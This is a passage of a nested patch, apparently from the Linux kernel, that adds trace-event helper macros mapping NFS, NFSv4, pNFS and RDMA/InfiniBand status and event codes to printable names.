++TRACE_DEFINE_ENUM(NFSERR_PERM);
++TRACE_DEFINE_ENUM(NFSERR_NOENT);
++TRACE_DEFINE_ENUM(NFSERR_IO);
++TRACE_DEFINE_ENUM(NFSERR_NXIO);
++TRACE_DEFINE_ENUM(NFSERR_EAGAIN);
++TRACE_DEFINE_ENUM(NFSERR_ACCES);
++TRACE_DEFINE_ENUM(NFSERR_EXIST);
++TRACE_DEFINE_ENUM(NFSERR_XDEV);
++TRACE_DEFINE_ENUM(NFSERR_NODEV);
++TRACE_DEFINE_ENUM(NFSERR_NOTDIR);
++TRACE_DEFINE_ENUM(NFSERR_ISDIR);
++TRACE_DEFINE_ENUM(NFSERR_INVAL);
++TRACE_DEFINE_ENUM(NFSERR_FBIG);
++TRACE_DEFINE_ENUM(NFSERR_NOSPC);
++TRACE_DEFINE_ENUM(NFSERR_ROFS);
++TRACE_DEFINE_ENUM(NFSERR_MLINK);
++TRACE_DEFINE_ENUM(NFSERR_OPNOTSUPP);
++TRACE_DEFINE_ENUM(NFSERR_NAMETOOLONG);
++TRACE_DEFINE_ENUM(NFSERR_NOTEMPTY);
++TRACE_DEFINE_ENUM(NFSERR_DQUOT);
++TRACE_DEFINE_ENUM(NFSERR_STALE);
++TRACE_DEFINE_ENUM(NFSERR_REMOTE);
++TRACE_DEFINE_ENUM(NFSERR_WFLUSH);
++TRACE_DEFINE_ENUM(NFSERR_BADHANDLE);
++TRACE_DEFINE_ENUM(NFSERR_NOT_SYNC);
++TRACE_DEFINE_ENUM(NFSERR_BAD_COOKIE);
++TRACE_DEFINE_ENUM(NFSERR_NOTSUPP);
++TRACE_DEFINE_ENUM(NFSERR_TOOSMALL);
++TRACE_DEFINE_ENUM(NFSERR_SERVERFAULT);
++TRACE_DEFINE_ENUM(NFSERR_BADTYPE);
++TRACE_DEFINE_ENUM(NFSERR_JUKEBOX);
++
++#define show_nfs_status(x) \
++	__print_symbolic(x, \
++		{ NFS_OK,			"OK" }, \
++		{ NFSERR_PERM,			"PERM" }, \
++		{ NFSERR_NOENT,			"NOENT" }, \
++		{ NFSERR_IO,			"IO" }, \
++		{ NFSERR_NXIO,			"NXIO" }, \
++		{ ECHILD,			"CHILD" }, \
++		{ NFSERR_EAGAIN,		"AGAIN" }, \
++		{ NFSERR_ACCES,			"ACCES" }, \
++		{ NFSERR_EXIST,			"EXIST" }, \
++		{ NFSERR_XDEV,			"XDEV" }, \
++		{ NFSERR_NODEV,			"NODEV" }, \
++		{ NFSERR_NOTDIR,		"NOTDIR" }, \
++		{ NFSERR_ISDIR,			"ISDIR" }, \
++		{ NFSERR_INVAL,			"INVAL" }, \
++		{ NFSERR_FBIG,			"FBIG" }, \
++		{ NFSERR_NOSPC,			"NOSPC" }, \
++		{ NFSERR_ROFS,			"ROFS" }, \
++		{ NFSERR_MLINK,			"MLINK" }, \
++		{ NFSERR_OPNOTSUPP,		"OPNOTSUPP" }, \
++		{ NFSERR_NAMETOOLONG,		"NAMETOOLONG" }, \
++		{ NFSERR_NOTEMPTY,		"NOTEMPTY" }, \
++		{ NFSERR_DQUOT,			"DQUOT" }, \
++		{ NFSERR_STALE,			"STALE" }, \
++		{ NFSERR_REMOTE,		"REMOTE" }, \
++		{ NFSERR_WFLUSH,		"WFLUSH" }, \
++		{ NFSERR_BADHANDLE,		"BADHANDLE" }, \
++		{ NFSERR_NOT_SYNC,		"NOTSYNC" }, \
++		{ NFSERR_BAD_COOKIE,		"BADCOOKIE" }, \
++		{ NFSERR_NOTSUPP,		"NOTSUPP" }, \
++		{ NFSERR_TOOSMALL,		"TOOSMALL" }, \
++		{ NFSERR_SERVERFAULT,		"REMOTEIO" }, \
++		{ NFSERR_BADTYPE,		"BADTYPE" }, \
++		{ NFSERR_JUKEBOX,		"JUKEBOX" })
++
++TRACE_DEFINE_ENUM(NFS_UNSTABLE);
++TRACE_DEFINE_ENUM(NFS_DATA_SYNC);
++TRACE_DEFINE_ENUM(NFS_FILE_SYNC);
++
++#define show_nfs_stable_how(x) \
++	__print_symbolic(x, \
++		{ NFS_UNSTABLE,			"UNSTABLE" }, \
++		{ NFS_DATA_SYNC,		"DATA_SYNC" }, \
++		{ NFS_FILE_SYNC,		"FILE_SYNC" })
++
++TRACE_DEFINE_ENUM(NFS4_OK);
++TRACE_DEFINE_ENUM(NFS4ERR_ACCESS);
++TRACE_DEFINE_ENUM(NFS4ERR_ATTRNOTSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_ADMIN_REVOKED);
++TRACE_DEFINE_ENUM(NFS4ERR_BACK_CHAN_BUSY);
++TRACE_DEFINE_ENUM(NFS4ERR_BADCHAR);
++TRACE_DEFINE_ENUM(NFS4ERR_BADHANDLE);
++TRACE_DEFINE_ENUM(NFS4ERR_BADIOMODE);
++TRACE_DEFINE_ENUM(NFS4ERR_BADLAYOUT);
++TRACE_DEFINE_ENUM(NFS4ERR_BADLABEL);
++TRACE_DEFINE_ENUM(NFS4ERR_BADNAME);
++TRACE_DEFINE_ENUM(NFS4ERR_BADOWNER);
++TRACE_DEFINE_ENUM(NFS4ERR_BADSESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_BADSLOT);
++TRACE_DEFINE_ENUM(NFS4ERR_BADTYPE);
++TRACE_DEFINE_ENUM(NFS4ERR_BADXDR);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_COOKIE);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_HIGH_SLOT);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_RANGE);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_SEQID);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_SESSION_DIGEST);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_STATEID);
++TRACE_DEFINE_ENUM(NFS4ERR_CB_PATH_DOWN);
++TRACE_DEFINE_ENUM(NFS4ERR_CLID_INUSE);
++TRACE_DEFINE_ENUM(NFS4ERR_CLIENTID_BUSY);
++TRACE_DEFINE_ENUM(NFS4ERR_COMPLETE_ALREADY);
++TRACE_DEFINE_ENUM(NFS4ERR_CONN_NOT_BOUND_TO_SESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_DEADLOCK);
++TRACE_DEFINE_ENUM(NFS4ERR_DEADSESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_DELAY);
++TRACE_DEFINE_ENUM(NFS4ERR_DELEG_ALREADY_WANTED);
++TRACE_DEFINE_ENUM(NFS4ERR_DELEG_REVOKED);
++TRACE_DEFINE_ENUM(NFS4ERR_DENIED);
++TRACE_DEFINE_ENUM(NFS4ERR_DIRDELEG_UNAVAIL);
++TRACE_DEFINE_ENUM(NFS4ERR_DQUOT);
++TRACE_DEFINE_ENUM(NFS4ERR_ENCR_ALG_UNSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_EXIST);
++TRACE_DEFINE_ENUM(NFS4ERR_EXPIRED);
++TRACE_DEFINE_ENUM(NFS4ERR_FBIG);
++TRACE_DEFINE_ENUM(NFS4ERR_FHEXPIRED);
++TRACE_DEFINE_ENUM(NFS4ERR_FILE_OPEN);
++TRACE_DEFINE_ENUM(NFS4ERR_GRACE);
++TRACE_DEFINE_ENUM(NFS4ERR_HASH_ALG_UNSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_INVAL);
++TRACE_DEFINE_ENUM(NFS4ERR_IO);
++TRACE_DEFINE_ENUM(NFS4ERR_ISDIR);
++TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTTRYLATER);
++TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTUNAVAILABLE);
++TRACE_DEFINE_ENUM(NFS4ERR_LEASE_MOVED);
++TRACE_DEFINE_ENUM(NFS4ERR_LOCKED);
++TRACE_DEFINE_ENUM(NFS4ERR_LOCKS_HELD);
++TRACE_DEFINE_ENUM(NFS4ERR_LOCK_RANGE);
++TRACE_DEFINE_ENUM(NFS4ERR_MINOR_VERS_MISMATCH);
++TRACE_DEFINE_ENUM(NFS4ERR_MLINK);
++TRACE_DEFINE_ENUM(NFS4ERR_MOVED);
++TRACE_DEFINE_ENUM(NFS4ERR_NAMETOOLONG);
++TRACE_DEFINE_ENUM(NFS4ERR_NOENT);
++TRACE_DEFINE_ENUM(NFS4ERR_NOFILEHANDLE);
++TRACE_DEFINE_ENUM(NFS4ERR_NOMATCHING_LAYOUT);
++TRACE_DEFINE_ENUM(NFS4ERR_NOSPC);
++TRACE_DEFINE_ENUM(NFS4ERR_NOTDIR);
++TRACE_DEFINE_ENUM(NFS4ERR_NOTEMPTY);
++TRACE_DEFINE_ENUM(NFS4ERR_NOTSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_NOT_ONLY_OP);
++TRACE_DEFINE_ENUM(NFS4ERR_NOT_SAME);
++TRACE_DEFINE_ENUM(NFS4ERR_NO_GRACE);
++TRACE_DEFINE_ENUM(NFS4ERR_NXIO);
++TRACE_DEFINE_ENUM(NFS4ERR_OLD_STATEID);
++TRACE_DEFINE_ENUM(NFS4ERR_OPENMODE);
++TRACE_DEFINE_ENUM(NFS4ERR_OP_ILLEGAL);
++TRACE_DEFINE_ENUM(NFS4ERR_OP_NOT_IN_SESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_PERM);
++TRACE_DEFINE_ENUM(NFS4ERR_PNFS_IO_HOLE);
++TRACE_DEFINE_ENUM(NFS4ERR_PNFS_NO_LAYOUT);
++TRACE_DEFINE_ENUM(NFS4ERR_RECALLCONFLICT);
++TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_BAD);
++TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_CONFLICT);
++TRACE_DEFINE_ENUM(NFS4ERR_REJECT_DELEG);
++TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG);
++TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG_TO_CACHE);
++TRACE_DEFINE_ENUM(NFS4ERR_REQ_TOO_BIG);
++TRACE_DEFINE_ENUM(NFS4ERR_RESOURCE);
++TRACE_DEFINE_ENUM(NFS4ERR_RESTOREFH);
++TRACE_DEFINE_ENUM(NFS4ERR_RETRY_UNCACHED_REP);
++TRACE_DEFINE_ENUM(NFS4ERR_RETURNCONFLICT);
++TRACE_DEFINE_ENUM(NFS4ERR_ROFS);
++TRACE_DEFINE_ENUM(NFS4ERR_SAME);
++TRACE_DEFINE_ENUM(NFS4ERR_SHARE_DENIED);
++TRACE_DEFINE_ENUM(NFS4ERR_SEQUENCE_POS);
++TRACE_DEFINE_ENUM(NFS4ERR_SEQ_FALSE_RETRY);
++TRACE_DEFINE_ENUM(NFS4ERR_SEQ_MISORDERED);
++TRACE_DEFINE_ENUM(NFS4ERR_SERVERFAULT);
++TRACE_DEFINE_ENUM(NFS4ERR_STALE);
++TRACE_DEFINE_ENUM(NFS4ERR_STALE_CLIENTID);
++TRACE_DEFINE_ENUM(NFS4ERR_STALE_STATEID);
++TRACE_DEFINE_ENUM(NFS4ERR_SYMLINK);
++TRACE_DEFINE_ENUM(NFS4ERR_TOOSMALL);
++TRACE_DEFINE_ENUM(NFS4ERR_TOO_MANY_OPS);
++TRACE_DEFINE_ENUM(NFS4ERR_UNKNOWN_LAYOUTTYPE);
++TRACE_DEFINE_ENUM(NFS4ERR_UNSAFE_COMPOUND);
++TRACE_DEFINE_ENUM(NFS4ERR_WRONGSEC);
++TRACE_DEFINE_ENUM(NFS4ERR_WRONG_CRED);
++TRACE_DEFINE_ENUM(NFS4ERR_WRONG_TYPE);
++TRACE_DEFINE_ENUM(NFS4ERR_XDEV);
++
++TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_MDS);
++TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_PNFS);
++
++#define show_nfs4_status(x) \
++	__print_symbolic(x, \
++		{ NFS4_OK,			"OK" }, \
++		{ EPERM,			"EPERM" }, \
++		{ ENOENT,			"ENOENT" }, \
++		{ EIO,				"EIO" }, \
++		{ ENXIO,			"ENXIO" }, \
++		{ EACCES,			"EACCES" }, \
++		{ EEXIST,			"EEXIST" }, \
++		{ EXDEV,			"EXDEV" }, \
++		{ ENOTDIR,			"ENOTDIR" }, \
++		{ EISDIR,			"EISDIR" }, \
++		{ EFBIG,			"EFBIG" }, \
++		{ ENOSPC,			"ENOSPC" }, \
++		{ EROFS,			"EROFS" }, \
++		{ EMLINK,			"EMLINK" }, \
++		{ ENAMETOOLONG,			"ENAMETOOLONG" }, \
++		{ ENOTEMPTY,			"ENOTEMPTY" }, \
++		{ EDQUOT,			"EDQUOT" }, \
++		{ ESTALE,			"ESTALE" }, \
++		{ EBADHANDLE,			"EBADHANDLE" }, \
++		{ EBADCOOKIE,			"EBADCOOKIE" }, \
++		{ ENOTSUPP,			"ENOTSUPP" }, \
++		{ ETOOSMALL,			"ETOOSMALL" }, \
++		{ EREMOTEIO,			"EREMOTEIO" }, \
++		{ EBADTYPE,			"EBADTYPE" }, \
++		{ EAGAIN,			"EAGAIN" }, \
++		{ ELOOP,			"ELOOP" }, \
++		{ EOPNOTSUPP,			"EOPNOTSUPP" }, \
++		{ EDEADLK,			"EDEADLK" }, \
++		{ ENOMEM,			"ENOMEM" }, \
++		{ EKEYEXPIRED,			"EKEYEXPIRED" }, \
++		{ ETIMEDOUT,			"ETIMEDOUT" }, \
++		{ ERESTARTSYS,			"ERESTARTSYS" }, \
++		{ ECONNREFUSED,			"ECONNREFUSED" }, \
++		{ ECONNRESET,			"ECONNRESET" }, \
++		{ ENETUNREACH,			"ENETUNREACH" }, \
++		{ EHOSTUNREACH,			"EHOSTUNREACH" }, \
++		{ EHOSTDOWN,			"EHOSTDOWN" }, \
++		{ EPIPE,			"EPIPE" }, \
++		{ EPFNOSUPPORT,			"EPFNOSUPPORT" }, \
++		{ EPROTONOSUPPORT,		"EPROTONOSUPPORT" }, \
++		{ NFS4ERR_ACCESS,		"ACCESS" }, \
++		{ NFS4ERR_ATTRNOTSUPP,		"ATTRNOTSUPP" }, \
++		{ NFS4ERR_ADMIN_REVOKED,	"ADMIN_REVOKED" }, \
++		{ NFS4ERR_BACK_CHAN_BUSY,	"BACK_CHAN_BUSY" }, \
++		{ NFS4ERR_BADCHAR,		"BADCHAR" }, \
++		{ NFS4ERR_BADHANDLE,		"BADHANDLE" }, \
++		{ NFS4ERR_BADIOMODE,		"BADIOMODE" }, \
++		{ NFS4ERR_BADLAYOUT,		"BADLAYOUT" }, \
++		{ NFS4ERR_BADLABEL,		"BADLABEL" }, \
++		{ NFS4ERR_BADNAME,		"BADNAME" }, \
++		{ NFS4ERR_BADOWNER,		"BADOWNER" }, \
++		{ NFS4ERR_BADSESSION,		"BADSESSION" }, \
++		{ NFS4ERR_BADSLOT,		"BADSLOT" }, \
++		{ NFS4ERR_BADTYPE,		"BADTYPE" }, \
++		{ NFS4ERR_BADXDR,		"BADXDR" }, \
++		{ NFS4ERR_BAD_COOKIE,		"BAD_COOKIE" }, \
++		{ NFS4ERR_BAD_HIGH_SLOT,	"BAD_HIGH_SLOT" }, \
++		{ NFS4ERR_BAD_RANGE,		"BAD_RANGE" }, \
++		{ NFS4ERR_BAD_SEQID,		"BAD_SEQID" }, \
++		{ NFS4ERR_BAD_SESSION_DIGEST,	"BAD_SESSION_DIGEST" }, \
++		{ NFS4ERR_BAD_STATEID,		"BAD_STATEID" }, \
++		{ NFS4ERR_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
++		{ NFS4ERR_CLID_INUSE,		"CLID_INUSE" }, \
++		{ NFS4ERR_CLIENTID_BUSY,	"CLIENTID_BUSY" }, \
++		{ NFS4ERR_COMPLETE_ALREADY,	"COMPLETE_ALREADY" }, \
++		{ NFS4ERR_CONN_NOT_BOUND_TO_SESSION, "CONN_NOT_BOUND_TO_SESSION" }, \
++		{ NFS4ERR_DEADLOCK,		"DEADLOCK" }, \
++		{ NFS4ERR_DEADSESSION,		"DEAD_SESSION" }, \
++		{ NFS4ERR_DELAY,		"DELAY" }, \
++		{ NFS4ERR_DELEG_ALREADY_WANTED,	"DELEG_ALREADY_WANTED" }, \
++		{ NFS4ERR_DELEG_REVOKED,	"DELEG_REVOKED" }, \
++		{ NFS4ERR_DENIED,		"DENIED" }, \
++		{ NFS4ERR_DIRDELEG_UNAVAIL,	"DIRDELEG_UNAVAIL" }, \
++		{ NFS4ERR_DQUOT,		"DQUOT" }, \
++		{ NFS4ERR_ENCR_ALG_UNSUPP,	"ENCR_ALG_UNSUPP" }, \
++		{ NFS4ERR_EXIST,		"EXIST" }, \
++		{ NFS4ERR_EXPIRED,		"EXPIRED" }, \
++		{ NFS4ERR_FBIG,			"FBIG" }, \
++		{ NFS4ERR_FHEXPIRED,		"FHEXPIRED" }, \
++		{ NFS4ERR_FILE_OPEN,		"FILE_OPEN" }, \
++		{ NFS4ERR_GRACE,		"GRACE" }, \
++		{ NFS4ERR_HASH_ALG_UNSUPP,	"HASH_ALG_UNSUPP" }, \
++		{ NFS4ERR_INVAL,		"INVAL" }, \
++		{ NFS4ERR_IO,			"IO" }, \
++		{ NFS4ERR_ISDIR,		"ISDIR" }, \
++		{ NFS4ERR_LAYOUTTRYLATER,	"LAYOUTTRYLATER" }, \
++		{ NFS4ERR_LAYOUTUNAVAILABLE,	"LAYOUTUNAVAILABLE" }, \
++		{ NFS4ERR_LEASE_MOVED,		"LEASE_MOVED" }, \
++		{ NFS4ERR_LOCKED,		"LOCKED" }, \
++		{ NFS4ERR_LOCKS_HELD,		"LOCKS_HELD" }, \
++		{ NFS4ERR_LOCK_RANGE,		"LOCK_RANGE" }, \
++		{ NFS4ERR_MINOR_VERS_MISMATCH,	"MINOR_VERS_MISMATCH" }, \
++		{ NFS4ERR_MLINK,		"MLINK" }, \
++		{ NFS4ERR_MOVED,		"MOVED" }, \
++		{ NFS4ERR_NAMETOOLONG,		"NAMETOOLONG" }, \
++		{ NFS4ERR_NOENT,		"NOENT" }, \
++		{ NFS4ERR_NOFILEHANDLE,		"NOFILEHANDLE" }, \
++		{ NFS4ERR_NOMATCHING_LAYOUT,	"NOMATCHING_LAYOUT" }, \
++		{ NFS4ERR_NOSPC,		"NOSPC" }, \
++		{ NFS4ERR_NOTDIR,		"NOTDIR" }, \
++		{ NFS4ERR_NOTEMPTY,		"NOTEMPTY" }, \
++		{ NFS4ERR_NOTSUPP,		"NOTSUPP" }, \
++		{ NFS4ERR_NOT_ONLY_OP,		"NOT_ONLY_OP" }, \
++		{ NFS4ERR_NOT_SAME,		"NOT_SAME" }, \
++		{ NFS4ERR_NO_GRACE,		"NO_GRACE" }, \
++		{ NFS4ERR_NXIO,			"NXIO" }, \
++		{ NFS4ERR_OLD_STATEID,		"OLD_STATEID" }, \
++		{ NFS4ERR_OPENMODE,		"OPENMODE" }, \
++		{ NFS4ERR_OP_ILLEGAL,		"OP_ILLEGAL" }, \
++		{ NFS4ERR_OP_NOT_IN_SESSION,	"OP_NOT_IN_SESSION" }, \
++		{ NFS4ERR_PERM,			"PERM" }, \
++		{ NFS4ERR_PNFS_IO_HOLE,		"PNFS_IO_HOLE" }, \
++		{ NFS4ERR_PNFS_NO_LAYOUT,	"PNFS_NO_LAYOUT" }, \
++		{ NFS4ERR_RECALLCONFLICT,	"RECALLCONFLICT" }, \
++		{ NFS4ERR_RECLAIM_BAD,		"RECLAIM_BAD" }, \
++		{ NFS4ERR_RECLAIM_CONFLICT,	"RECLAIM_CONFLICT" }, \
++		{ NFS4ERR_REJECT_DELEG,		"REJECT_DELEG" }, \
++		{ NFS4ERR_REP_TOO_BIG,		"REP_TOO_BIG" }, \
++		{ NFS4ERR_REP_TOO_BIG_TO_CACHE,	"REP_TOO_BIG_TO_CACHE" }, \
++		{ NFS4ERR_REQ_TOO_BIG,		"REQ_TOO_BIG" }, \
++		{ NFS4ERR_RESOURCE,		"RESOURCE" }, \
++		{ NFS4ERR_RESTOREFH,		"RESTOREFH" }, \
++		{ NFS4ERR_RETRY_UNCACHED_REP,	"RETRY_UNCACHED_REP" }, \
++		{ NFS4ERR_RETURNCONFLICT,	"RETURNCONFLICT" }, \
++		{ NFS4ERR_ROFS,			"ROFS" }, \
++		{ NFS4ERR_SAME,			"SAME" }, \
++		{ NFS4ERR_SHARE_DENIED,		"SHARE_DENIED" }, \
++		{ NFS4ERR_SEQUENCE_POS,		"SEQUENCE_POS" }, \
++		{ NFS4ERR_SEQ_FALSE_RETRY,	"SEQ_FALSE_RETRY" }, \
++		{ NFS4ERR_SEQ_MISORDERED,	"SEQ_MISORDERED" }, \
++		{ NFS4ERR_SERVERFAULT,		"SERVERFAULT" }, \
++		{ NFS4ERR_STALE,		"STALE" }, \
++		{ NFS4ERR_STALE_CLIENTID,	"STALE_CLIENTID" }, \
++		{ NFS4ERR_STALE_STATEID,	"STALE_STATEID" }, \
++		{ NFS4ERR_SYMLINK,		"SYMLINK" }, \
++		{ NFS4ERR_TOOSMALL,		"TOOSMALL" }, \
++		{ NFS4ERR_TOO_MANY_OPS,		"TOO_MANY_OPS" }, \
++		{ NFS4ERR_UNKNOWN_LAYOUTTYPE,	"UNKNOWN_LAYOUTTYPE" }, \
++		{ NFS4ERR_UNSAFE_COMPOUND,	"UNSAFE_COMPOUND" }, \
++		{ NFS4ERR_WRONGSEC,		"WRONGSEC" }, \
++		{ NFS4ERR_WRONG_CRED,		"WRONG_CRED" }, \
++		{ NFS4ERR_WRONG_TYPE,		"WRONG_TYPE" }, \
++		{ NFS4ERR_XDEV,			"XDEV" }, \
++		/* ***** Internal to Linux NFS client ***** */ \
++		{ NFS4ERR_RESET_TO_MDS,		"RESET_TO_MDS" }, \
++		{ NFS4ERR_RESET_TO_PNFS,	"RESET_TO_PNFS" })
++
++#define show_nfs4_verifier(x) \
++	__print_hex_str(x, NFS4_VERIFIER_SIZE)
++
++TRACE_DEFINE_ENUM(IOMODE_READ);
++TRACE_DEFINE_ENUM(IOMODE_RW);
++TRACE_DEFINE_ENUM(IOMODE_ANY);
++
++#define show_pnfs_layout_iomode(x) \
++	__print_symbolic(x, \
++		{ IOMODE_READ,			"READ" }, \
++		{ IOMODE_RW,			"RW" }, \
++		{ IOMODE_ANY,			"ANY" })
++
++#define show_rca_mask(x) \
++	__print_flags(x, "|", \
++		{ BIT(RCA4_TYPE_MASK_RDATA_DLG),	"RDATA_DLG" }, \
++		{ BIT(RCA4_TYPE_MASK_WDATA_DLG),	"WDATA_DLG" }, \
++		{ BIT(RCA4_TYPE_MASK_DIR_DLG),		"DIR_DLG" }, \
++		{ BIT(RCA4_TYPE_MASK_FILE_LAYOUT),	"FILE_LAYOUT" }, \
++		{ BIT(RCA4_TYPE_MASK_BLK_LAYOUT),	"BLK_LAYOUT" }, \
++		{ BIT(RCA4_TYPE_MASK_OBJ_LAYOUT_MIN),	"OBJ_LAYOUT_MIN" }, \
++		{ BIT(RCA4_TYPE_MASK_OBJ_LAYOUT_MAX),	"OBJ_LAYOUT_MAX" }, \
++		{ BIT(RCA4_TYPE_MASK_OTHER_LAYOUT_MIN),	"OTHER_LAYOUT_MIN" }, \
++		{ BIT(RCA4_TYPE_MASK_OTHER_LAYOUT_MAX),	"OTHER_LAYOUT_MAX" })
++
++#define show_nfs4_seq4_status(x) \
++	__print_flags(x, "|", \
++		{ SEQ4_STATUS_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
++		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRING,	"CB_GSS_CONTEXTS_EXPIRING" }, \
++		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRED,	"CB_GSS_CONTEXTS_EXPIRED" }, \
++		{ SEQ4_STATUS_EXPIRED_ALL_STATE_REVOKED, "EXPIRED_ALL_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_EXPIRED_SOME_STATE_REVOKED, "EXPIRED_SOME_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_ADMIN_STATE_REVOKED,	"ADMIN_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_RECALLABLE_STATE_REVOKED,	"RECALLABLE_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_LEASE_MOVED,		"LEASE_MOVED" }, \
++		{ SEQ4_STATUS_RESTART_RECLAIM_NEEDED,	"RESTART_RECLAIM_NEEDED" }, \
++		{ SEQ4_STATUS_CB_PATH_DOWN_SESSION,	"CB_PATH_DOWN_SESSION" }, \
++		{ SEQ4_STATUS_BACKCHANNEL_FAULT,	"BACKCHANNEL_FAULT" })
+diff --git a/include/trace/misc/rdma.h b/include/trace/misc/rdma.h
+new file mode 100644
+index 0000000000000..81bb454fc2888
+--- /dev/null
++++ b/include/trace/misc/rdma.h
+@@ -0,0 +1,168 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (c) 2017 Oracle.  All rights reserved.
++ */
++
++/*
++ * enum ib_event_type, from include/rdma/ib_verbs.h
++ */
++#define IB_EVENT_LIST				\
++	ib_event(CQ_ERR)			\
++	ib_event(QP_FATAL)			\
++	ib_event(QP_REQ_ERR)			\
++	ib_event(QP_ACCESS_ERR)			\
++	ib_event(COMM_EST)			\
++	ib_event(SQ_DRAINED)			\
++	ib_event(PATH_MIG)			\
++	ib_event(PATH_MIG_ERR)			\
++	ib_event(DEVICE_FATAL)			\
++	ib_event(PORT_ACTIVE)			\
++	ib_event(PORT_ERR)			\
++	ib_event(LID_CHANGE)			\
++	ib_event(PKEY_CHANGE)			\
++	ib_event(SM_CHANGE)			\
++	ib_event(SRQ_ERR)			\
++	ib_event(SRQ_LIMIT_REACHED)		\
++	ib_event(QP_LAST_WQE_REACHED)		\
++	ib_event(CLIENT_REREGISTER)		\
++	ib_event(GID_CHANGE)			\
++	ib_event_end(WQ_FATAL)
++
++#undef ib_event
++#undef ib_event_end
++
++#define ib_event(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
++#define ib_event_end(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
++
++IB_EVENT_LIST
++
++#undef ib_event
++#undef ib_event_end
++
++#define ib_event(x)		{ IB_EVENT_##x, #x },
++#define ib_event_end(x)		{ IB_EVENT_##x, #x }
++
++#define rdma_show_ib_event(x) \
++		__print_symbolic(x, IB_EVENT_LIST)
++
++/*
++ * enum ib_wc_status type, from include/rdma/ib_verbs.h
++ */
++#define IB_WC_STATUS_LIST			\
++	ib_wc_status(SUCCESS)			\
++	ib_wc_status(LOC_LEN_ERR)		\
++	ib_wc_status(LOC_QP_OP_ERR)		\
++	ib_wc_status(LOC_EEC_OP_ERR)		\
++	ib_wc_status(LOC_PROT_ERR)		\
++	ib_wc_status(WR_FLUSH_ERR)		\
++	ib_wc_status(MW_BIND_ERR)		\
++	ib_wc_status(BAD_RESP_ERR)		\
++	ib_wc_status(LOC_ACCESS_ERR)		\
++	ib_wc_status(REM_INV_REQ_ERR)		\
++	ib_wc_status(REM_ACCESS_ERR)		\
++	ib_wc_status(REM_OP_ERR)		\
++	ib_wc_status(RETRY_EXC_ERR)		\
++	ib_wc_status(RNR_RETRY_EXC_ERR)		\
++	ib_wc_status(LOC_RDD_VIOL_ERR)		\
++	ib_wc_status(REM_INV_RD_REQ_ERR)	\
++	ib_wc_status(REM_ABORT_ERR)		\
++	ib_wc_status(INV_EECN_ERR)		\
++	ib_wc_status(INV_EEC_STATE_ERR)		\
++	ib_wc_status(FATAL_ERR)			\
++	ib_wc_status(RESP_TIMEOUT_ERR)		\
++	ib_wc_status_end(GENERAL_ERR)
++
++#undef ib_wc_status
++#undef ib_wc_status_end
++
++#define ib_wc_status(x)		TRACE_DEFINE_ENUM(IB_WC_##x);
++#define ib_wc_status_end(x)	TRACE_DEFINE_ENUM(IB_WC_##x);
++
++IB_WC_STATUS_LIST
++
++#undef ib_wc_status
++#undef ib_wc_status_end
++
++#define ib_wc_status(x)		{ IB_WC_##x, #x },
++#define ib_wc_status_end(x)	{ IB_WC_##x, #x }
++
++#define rdma_show_wc_status(x) \
++		__print_symbolic(x, IB_WC_STATUS_LIST)
++
++/*
++ * enum ib_cm_event_type, from include/rdma/ib_cm.h
++ */
++#define IB_CM_EVENT_LIST			\
++	ib_cm_event(REQ_ERROR)			\
++	ib_cm_event(REQ_RECEIVED)		\
++	ib_cm_event(REP_ERROR)			\
++	ib_cm_event(REP_RECEIVED)		\
++	ib_cm_event(RTU_RECEIVED)		\
++	ib_cm_event(USER_ESTABLISHED)		\
++	ib_cm_event(DREQ_ERROR)			\
++	ib_cm_event(DREQ_RECEIVED)		\
++	ib_cm_event(DREP_RECEIVED)		\
++	ib_cm_event(TIMEWAIT_EXIT)		\
++	ib_cm_event(MRA_RECEIVED)		\
++	ib_cm_event(REJ_RECEIVED)		\
++	ib_cm_event(LAP_ERROR)			\
++	ib_cm_event(LAP_RECEIVED)		\
++	ib_cm_event(APR_RECEIVED)		\
++	ib_cm_event(SIDR_REQ_ERROR)		\
++	ib_cm_event(SIDR_REQ_RECEIVED)		\
++	ib_cm_event_end(SIDR_REP_RECEIVED)
++
++#undef ib_cm_event
++#undef ib_cm_event_end
++
++#define ib_cm_event(x)		TRACE_DEFINE_ENUM(IB_CM_##x);
++#define ib_cm_event_end(x)	TRACE_DEFINE_ENUM(IB_CM_##x);
++
++IB_CM_EVENT_LIST
++
++#undef ib_cm_event
++#undef ib_cm_event_end
++
++#define ib_cm_event(x)		{ IB_CM_##x, #x },
++#define ib_cm_event_end(x)	{ IB_CM_##x, #x }
++
++#define rdma_show_ib_cm_event(x) \
++		__print_symbolic(x, IB_CM_EVENT_LIST)
++
++/*
++ * enum rdma_cm_event_type, from include/rdma/rdma_cm.h
++ */
++#define RDMA_CM_EVENT_LIST			\
++	rdma_cm_event(ADDR_RESOLVED)		\
++	rdma_cm_event(ADDR_ERROR)		\
